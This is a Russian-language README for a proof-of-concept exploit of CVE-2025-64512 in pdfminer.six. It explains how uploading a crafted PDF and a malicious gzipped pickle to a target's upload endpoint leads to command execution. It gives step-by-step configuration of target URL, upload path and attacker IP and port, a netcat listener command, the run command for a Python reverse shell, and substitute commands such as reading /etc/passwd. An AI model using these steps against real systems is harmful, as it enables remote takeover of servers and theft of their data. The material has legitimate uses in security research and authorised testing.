
Эксплойт для CVE-2025-64512 для получения реверс-шелла.
Этот PoC демонстрирует уязвимость в pdfminer.six (CVE-2025-64512), которая может привести к произвольному выполнению команд при обработке вредоносного PDF. Эксплойт использует специально созданный PDF, который ссылается на вредоносный pickle Python (сжатый gzip). Когда уязвимое приложение обрабатывает PDF, оно загружает pickle и выполняет встроенную полезную нагрузку.
Включённый PoC настроен на выполнение Python reverse shell, но полезная нагрузка может быть заменена любой командой.
requestsУстановите необходимую зависимость:
pip install requests
Перед запуском эксплойта отредактируйте раздел конфигурации в exploit.py:
BASE_URL = ""
UPLOAD_DIR = ""
LHOST = ""
LPORT = 4444
URL-адрес уязвимой конечной точки загрузки.
Пример:
BASE_URL = "http://target/upload.php"
Эксплойт загружает на этот эндпоинт как вредоносный PDF, так и сжатый pickle.
Абсолютный каталог на целевой системе, в котором хранятся загруженные файлы.
Пример:
UPLOAD_DIR = "/var/www/html/uploads"
Этот путь встраивается в созданный PDF и должен совпадать с расположением, из которого уязвимое приложение впоследствии будет читать загруженный pickle.
Если каталог загрузки неизвестен, определите его на этапе перечисления. В зависимости от приложения могут быть полезны следующие методы:
Типичные расположения включают:
/var/www/html/uploads
/var/www/uploads
/srv/www/uploads
/opt/application/uploads
Правильный каталог полностью зависит от целевого приложения.
IP-адрес вашего слушателя (listener).
Пример:
LHOST = "10.10.14.5"
Порт для прослушивания reverse shell.
Пример:
LPORT = 4444
Запустите слушатель перед запуском эксплойта:
nc -lvnp 4444
Запустите эксплойт:
python3 exploit.py
Скрипт выполнит следующее:
evil.pickle.gz.Вместо reverse shell можно выполнить любую команду операционной системы, изменив команду, передаваемую в:
create_pickle_with_cmd(command)
Примеры включают:
id
whoami
uname -a
cat /etc/passwd
Данный PoC предоставляется исключительно в образовательных целях, для исследований в области безопасности и авторизованного тестирования на проникновение. Используйте его только против систем, на которые у вас есть явное разрешение на проведение тестирования безопасности.